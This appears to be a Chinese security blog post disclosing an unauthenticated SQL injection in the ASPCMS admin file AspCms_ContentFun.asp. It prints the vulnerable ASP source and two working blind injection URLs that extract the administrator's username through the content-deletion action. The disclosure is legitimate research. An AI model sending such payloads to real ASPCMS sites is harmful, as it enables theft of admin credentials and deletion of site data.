- A+
所属分类:Seay信息安全博客
显示不全请点击全屏阅读
ASPCMS系统对用户提交的参数过滤不严,导致攻击者可以提交SQL语句查询数据库获取敏感信息。
漏洞存在于/admin_aspcms/_content/_Content/AspCms_ContentFun.asp,这个文件未验证管理员权限,因此如何人都可以访问,同时该文件对获取的参数没有使用自定义的filterPara函数过滤,导致多处注入,代码入下:
<!--#include file="../../inc/AspCms_SettingClass.asp" -->
<!--#include file="../../editor/fckeditor.asp" -->
<%
'die debugmode
dim action : action=getForm("action","get")
dim ContentID, LanguageID, SortID, GroupID, Exclusive, Title, Title2, TitleColor, IsOutLink, OutLink, Author, ContentSource, ContentTag, Content, ContentStatus, IsTop, IsRecommend, IsImageNews, IsHeadline, IsFeatured, ContentOrder, IsGenerated, Visits, AddTime, ImagePath, IndexImage, DownURL, PageTitle, PageKeywords, PageDesc, PageFileName, spec, EditTime,DownGroupID,IsNoComment,Star,Timeing,TimeStatus,VideoGroupID,CHvalue,SpecCategory
'SpecCategory用于判断是哪个类型的自定义参数
dim sortType, keyword, page, psize, order, ordsc, sortTypeName
sortType=getForm("sortType","get")
if isnul(sortType) then sortType=0
sortid=getForm("sortid","post")
if isnul(sortid) then sortid=getForm("sortid","get")
keyword=getForm("keyword","post")
if isnul(keyword) then keyword=getForm("keyword","get")
page=getForm("page","get")
psize=getForm("psize","get")
order=getForm("order","get")
ordsc=getForm("ordsc","get")
DownGroupID=getForm("DownGroupID","post")
VideoGroupID=getForm("VideoGroupID","post")
select case sortType
case "2"
sortTypeName ="文章"
SpecCategory = "C"
case "3"
sortTypeName ="产品"
SpecCategory = "P"
case "4"
sortTypeName ="下载"
SpecCategory = "DL"
case "5"
sortTypeName ="招聘"
SpecCategory = "HR"
case "6"
sortTypeName ="相册"
SpecCategory = "FO"
case "8"
sortTypeName = "视频"
SpecCategory = "VI"
end select
'单篇1,文章2,产品3,下载4,招聘5,相册6,链接7,视频8
Select case action
case "add" : addContent
case "edit" : editContent
case "move" : moveContent
case "copy" : copyContent
case "rpost" : rpostContent
case "del" : delContent
case "recovery" : Recovery
case "tdel" : trueDelContent
case "on" : onOff "on", "Content", "ContentID", "ContentStatus", "", getPageName()&"?sortType="&sortType&"&sortid="&sortid&"&keyword="&keyword&"&page="&page&"&psize="&psize&"&order="&order&"&ordsc="&ordsc
case "off" : onOff "off", "Content", "ContentID", "ContentStatus", "", getPageName()&"?sortType="&sortType&"&sortid="&sortid&"&keyword="&keyword&"&page="&page&"&psize="&psize&"&order="&order&"&ordsc="&ordsc
case "order" : UpdateOrder
End Select
Sub trueDelContent
dim id : id=getForm("id","both")
if isnul(id) then alertMsgAndGo "请选择要操作的内容","-1"
if runmode=1 then
dim rs, sql, filepath
dim templateobj : set templateobj=new TemplateClass
sql="select ContentID,Title,sortType,SortFolder,a.GroupID,ContentFolder,ContentFileName,a.AddTime,a.PageFileName,a.SortID,b.GroupID from {prefix}Content as a, {prefix}Sort as b where a.LanguageID="&session("languageID")&" and a.SortID=b.SortID and ContentStatus=2 and ContentID in("&id&")"
set rs=conn.exec(sql,"r1")
do while not rs.eof
filepath=templateobj.getContentLink(rs("SortID"),rs("ContentID"),rs("SortFolder"),rs("a.GroupID"),rs("ContentFolder"),rs("ContentFileName"),rs("AddTime"),rs("PageFileName"),rs("b.GroupID"))
if isExistFile(filepath) then delFile filepath
'echo filepath&"<br>"
rs.movenext
loop
end if
conn.exec "delete from {prefix}Content where ContentStatus=2 and ContentID in("&id&")","exe"
alertMsgAndGo "彻底删除成功",getPageName()&"?sortType="&sortType&"&sortid="&sortid&"&keyword="&keyword&"&page="&page&"&psize="&psize&"&order="&order&"&ordsc="&ordsc
End Sub
利用比较简单,利用iif来强制报错:
http://192.168.116.130/aspcms/admin_aspcms/_content/_Content/AspCms_ContentFun.asp?action=tdel&id=2=iif(((select asc(mid(LoginName,1,1)) from AspCms_User where UserID=1)=97),2,chr(97))
查询管理员用户名第一个字符是否为a
http://192.168.116.130/aspcms/admin_aspcms/_content/_Content/AspCms_ContentFun.asp?action=tdel&id=2=iif(((select asc(mid(LoginName,1,1)) from AspCms_User where UserID=1)=98),2,chr(97))
查询管理员用户名第一个字符是否为b
如图,返回为假,强制报错:
作者:My5t3ry
Tags:
如果您喜欢我的博客,欢迎点击图片定订阅到邮箱 也可以点击链接【订阅到鲜果】
如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
